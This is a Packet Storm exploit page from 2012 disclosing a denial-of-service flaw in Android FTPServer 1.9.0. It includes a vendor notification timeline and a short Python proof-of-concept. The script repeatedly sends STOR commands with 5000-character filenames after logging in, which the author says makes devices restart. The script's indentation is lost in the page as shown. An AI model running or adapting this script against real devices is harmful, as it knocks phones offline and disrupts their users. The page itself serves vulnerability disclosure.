what you don't know can hurt you

Android FTPServer 1.9.0 Denial Of Service

Android FTPServer 1.9.0 Denial Of Service
Posted Mar 20, 2012
Authored by G13

Android FTPServer version 1.9.0 suffers from a denial of service vulnerability.

tags | exploit, denial of service
MD5 | e97de426eaacf32764cd2c032e0cdf4e

Android FTPServer 1.9.0 Denial Of Service

Change Mirror Download
# Exploit Title: Android FTPServer 1.9.0 Remote DoS
# Date: 03/20/12
# Author: G13
# Twitter: @g13net
# Software Site: https://sites.google.com/site/andreasliebigapps/ftpserver/
# Download Link: http://www.g13net.com/ftpserver.apk
# Version: 1.9.0
# Category: DoS (android)
#

##### Vulnerability #####

FTPServer is vulnerable to a DoS condition when long file names are
repeatedly attempted to be written via the STOR command.

Successful exploitation will causes devices to restart.

Android Security Team has confirmed this issue.

I have been able to test this exploit against Android 2.2 and 2.3.
4.0 (ICS) appears not to be vulnerable.

##### Vendor Timeline #####

Android Security Team:
10/20/11 - Vendor Notified of vulnerability, Vendor notifies me they will
be looking into the issue
10/21/11 - vendor Requests bug report from device, bug report sent, PoC
Code Delivered to Vendor
10/24/11 - Asked Vendor Status, stated I have been able to duplicate issue
on multiple devices
10/25/11 - Vendor states they are still working on it
10/30/11 - Current Status asked
10/31/11 - vendor Replies no updates
11/7/11 - Emailed Vendor, they ask for more clarification on issue. I
submit more details
11/8/11 - Vendor acknowledges that it is not the APK itself causing the
crashes. Vendor also confirms full reboots from PoC code.
11/9/11 - Vendor asks if I am just crashing application or device in
certain instances. I state device is restarting.
11/11/11 - I ask if there is anything more I may assist with. Vendor
states they have isolated the impacted component and are working on a
fix.
11/18/11 - Current status Asked.
12/8/11 - Update requested, response that they will contact Kernel team for
an update
01/13/12 - Current status asked, no response
03/06/12 - Current status asked, no response
03/20/12 - Disclosure

Developer:
1/24/12 - Developer contacted
1/25/12 - Developer Responds
1/27/12 - Supplied Developer with PoC code, Developer confirms issue
1/29/12 - Developer releases new version
3/20/12 - Disclosure

##### PoC #####

#!/usr/bin/python
# Android FTPServer PoC Device Crash

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = "STOR " + "A" * 5000 + "\r\n"
for x in xrange(1,31):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print x
s.connect(('172.16.30.108',2121))

data=s.recv(1024)
s.send("USER test\r\n")
data=s.recv(1024)
s.send("PASS test\r\n")

s.send(buffer)

s.send("QUIT")

s.close()
Login or Register to add favorites

File Archive:

July 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    13 Files
  • 2
    Jul 2nd
    12 Files
  • 3
    Jul 3rd
    1 Files
  • 4
    Jul 4th
    2 Files
  • 5
    Jul 5th
    34 Files
  • 6
    Jul 6th
    21 Files
  • 7
    Jul 7th
    21 Files
  • 8
    Jul 8th
    13 Files
  • 9
    Jul 9th
    6 Files
  • 10
    Jul 10th
    1 Files
  • 11
    Jul 11th
    3 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    19 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    15 Files
  • 16
    Jul 16th
    9 Files
  • 17
    Jul 17th
    2 Files
  • 18
    Jul 18th
    2 Files
  • 19
    Jul 19th
    19 Files
  • 20
    Jul 20th
    21 Files
  • 21
    Jul 21st
    53 Files
  • 22
    Jul 22nd
    14 Files
  • 23
    Jul 23rd
    14 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close